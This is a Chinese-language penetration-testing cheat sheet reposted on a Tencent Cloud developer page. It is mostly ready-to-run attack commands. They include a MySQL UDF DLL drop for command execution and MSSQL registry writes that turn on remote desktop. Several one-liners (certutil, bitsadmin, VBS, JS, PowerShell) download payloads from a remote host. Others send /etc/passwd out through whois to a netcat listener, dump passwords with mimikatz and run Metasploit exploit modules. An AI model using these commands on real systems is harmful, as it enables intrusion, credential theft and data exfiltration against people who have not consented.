渗透测试的一些tips
团队小伙伴学习亮神文章的笔记,希望对大家有所帮助...
1、windows快速查找exp
systeminfo>micropoor.txt&(for %i in ( KB977165 KB2160329 KB2503665 KB2592799
KB2707511 KB2829361 KB2850851 KB3000061 KB3045171 KB3077657 KB3079904
KB3134228 KB3143141 KB3141780 ) do @type micropoor.txt|@find /i
"%i"|| @echo %i you can fuck)&del /f /q /a micropoor.txt需要可写目录....
2、mssql对于远程桌面的常见操作
查看
EXEC master..xp_regread 'HKEY_LOCAL_MACHINE',
'SYSTEM\CurrentControlSet\Control\Terminal Server',
'fDenyTSConnections'查看端口
EXEC master..xp_regread 'HKEY_LOCAL_MACHINE',
'SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp',
'PortNumber'开启
EXEC master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE',
'SYSTEM\CurrentControlSet\Control\TerminalServer',
'fDenyTSConnections','REG_DWORD',0;3、交互的shell下mysql无法交互
使用-e进行解决
mysql -uroot -pxxxxxxxx mysql -e "create table a (cmd LONGBLOB);"
mysql -uroot -pxxxxxxxx mysql -e "insert into a (cmd) values (hex(load_file('C:\\xxxx\\xxxx.dll')));"
mysql -uroot -pxxxxxxxx mysql -e "SELECT unhex(cmd) FROM a INTO DUMPFILE
'c:\\windows\\system32\\xxxx.dll';"
mysql -uroot -pxxxxxxxx mysql -e "CREATE FUNCTION shell RETURNS STRING SONAME 'udf.dll'"
mysql -uroot -pxxxxxxxx mysql -e "select shell('cmd','C:\\xxxx\\xxx\\xxxxx.exe');"4、主机发现
udp:
msf > use auxiliary/scanner/discovery/udp_probe
msf > use auxiliary/scanner/discovery/udp_sweeparp:
msf > use auxiliary/scanner/discovery/arp_sweep
nmap -sn -PR 192.168.1.1/24
https://github.com/QbsuranAlang/arp-scan-windows-/tree/master/arp-scan
arp-scan.exe -t 192.168.1.1/24netbios:
msf > use auxiliary/scanner/netbios/nbname
nmap -sU --script nbstat.nse -p137 192.168.1.0/24 -T4
nbtscan-1.0.35.exe -m 192.168.1.0/24snmp:
msf > use auxiliary/scanner/snmp/snmp_enum
nmap -sU --script snmp-brute 192.168.1.0/24 -T4icmp:
for /L %P in (1,1,254) DO @ping ‐w 1 ‐n 1 192.168.1.%P | findstr "TTL ="
nmap ‐sP ‐PI 192.168.1.0/24 ‐T4
D:\>tcping.exe ‐n 1 192.168.1.0 80smb:
msf auxiliary(scanner/smb/smb_version) > show options
nmap ‐sU ‐sS ‐‐script smb‐enum‐shares.nse ‐p 445 192.168.1.119
for /l %a in (1,1,254) do start /min /low telnet 192.168.1.%a 445
1..5 | % { $a = $_; 445 | % {echo ((new‐object
Net.Sockets.TcpClient).Connect("192.168.1.$a",$_)) "Port $_ is open"}
2>$null}msf:
auxiliary/scanner/discovery/arp_sweep
auxiliary/scanner/discovery/udp_sweep
auxiliary/scanner/ftp/ftp_version
auxiliary/scanner/http/http_version
auxiliary/scanner/smb/smb_version
auxiliary/scanner/ssh/ssh_version
auxiliary/scanner/telnet/telnet_version
auxiliary/scanner/discovery/udp_probe
auxiliary/scanner/dns/dns_amp
auxiliary/scanner/mysql/mysql_version
auxiliary/scanner/netbios/nbname
auxiliary/scanner/http/title
auxiliary/scanner/db2/db2_version
auxiliary/scanner/portscan/ack
auxiliary/scanner/portscan/tcp
auxiliary/scanner/portscan/syn
auxiliary/scanner/portscan/ftpbounce
auxiliary/scanner/portscan/xmas
auxiliary/scanner/rdp/rdp_scanner
auxiliary/scanner/smtp/smtp_version
auxiliary/scanner/pop3/pop3_version
auxiliary/scanner/postgres/postgres_version
auxiliary/scanner/ftp/anonymous
windows/gather/arp_scanner
post/windows/gather/enum_ad_computers
post/windows/gather/enum_computers
post/windows/gather/enum_domain
post/windows/gather/enum_domains
post/windows/gather/enum_ad_user_commentsmsf下的mysql攻击模块
1. auxiliary/scanner/mysql/mysql_login
2. exploit/multi/mysql/mysql_udf_payload
3. exploit/windows/mysql/mysql_mof
4. exploit/windows/mysql/scrutinizer_upload_exec
5. auxiliary/scanner/mysql/mysql_hashdump
6. auxiliary/admin/mysql/mysql_sql
7. auxiliary/scanner/mysql/mysql_versionmsf下的mssql攻击模块
1. auxiliary/admin/mssql/mssql_enum
2. auxiliary/admin/mssql/mssql_enum_sql_logins
3. auxiliary/admin/mssql/mssql_escalate_dbowner
4. auxiliary/admin/mssql/mssql_exec
5. auxiliary/admin/mssql/mssql_sql
6. auxiliary/admin/mssql/mssql_sql_file
7. auxiliary/scanner/mssql/mssql_hashdump
8. auxiliary/scanner/mssql/mssql_login
9. auxiliary/scanner/mssql/mssql_ping
10. exploit/windows/mssql/mssql_payload
11. post/windows/manage/mssql_local_auth_bypass5、payload下载
vbs:
echo set a=createobject(^"adod^"+^"b.stream^"):set
w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile
wsh.arguments(1),2 >>downfile.vbs
cscript downfile.vbs http://192.168.1.115/robots.txt C:\Inetpub\b.txtstrFileURL = "http://192.168.1.115/robots.txt"
strHDLocation = "c:\test\logo.txt"
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1
objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0
Set objFSO = CreateObject("Scripting.FileSystemObject")
If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocati on Set objFSO = Nothing
objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if
Set objXMLHTTP = Nothingcertutil
certutil.exe -urlcache -split -f http://192.168.1.115/robots.txt
certutil.exe -urlcache -split -f http://192.168.1.115/robots.txt deletebitsadmin
E:\>bitsadmin /rawreturn /transfer down "http://192.168.1.115/robots.txt" E:\PDF\robots.txtjs
读:
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
WScript.Echo(WinHttpReq.ResponseText);
C:\test>cscript /nologo downfile.js http://192.168.1.115/robots.txt写:
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
BinStream = new ActiveXObject("ADODB.Stream"); BinStream.Type = 1;
BinStream.Open(); BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile("micropoor.exe");
C:\test>cscript /nologo dowfile2.js http://192.168.1.115/robots.txtpowershell
$Urls = @()
$Urls += "http://192.168.1.115/robots.txt"
$OutPath = "E:\PDF\"
ForEach ( $item in $Urls) {
$file = $OutPath + ($item).split('/')[-1]
(New-Object System.Net.WebClient).DownloadFile($item, $file)
}$url = "http://192.168.1.115/robots.txt"
$output = "C:\inetpub\robots.txt"
$start_time = Get-Date
Invoke-WebRequest -Uri $url -OutFile $output
Write-Output "Time : $((Get-Date).Subtract($start_time).Seconds) second(s)"powershell -exec bypass -c (new-object System.Net.WebClient).DownloadFile('http://192.168.1.115/robots.txt','E:\robots.txt')6、内网文件传输
root@john:~# whois -h 127.0.0.1 -p 4444 `cat /etc/passwd | base64`root@john:/tmp# nc -l -v -p 4444 | sed "s/ //g" | base64 -d7、密码提取
mimikatz_command -f sekurlsa::searchPasswords
mimikatz.exe "log Micropoor.txt" "privilege::debug" "token::elevate" "lsadump::sam" "exit"
mimikatz.exe "lsadump::sam /system:sys.hiv /sam:sam.hiv" exit8、portfwd转发
portfwd add ‐l 33389 ‐r 192.168.1.119 ‐p 3389本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2020-04-20,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录
相关产品与服务
云数据库 SQL Server
腾讯云数据库 SQL Server (TencentDB for SQL Server)是业界最常用的商用数据库之一,对基于 Windows 架构的应用程序具有完美的支持。TencentDB for SQL Server 拥有微软正版授权,可持续为用户提供最新的功能,避免未授权使用软件的风险。具有即开即用、稳定可靠、安全运行、弹性扩缩等特点。
腾讯云开发者
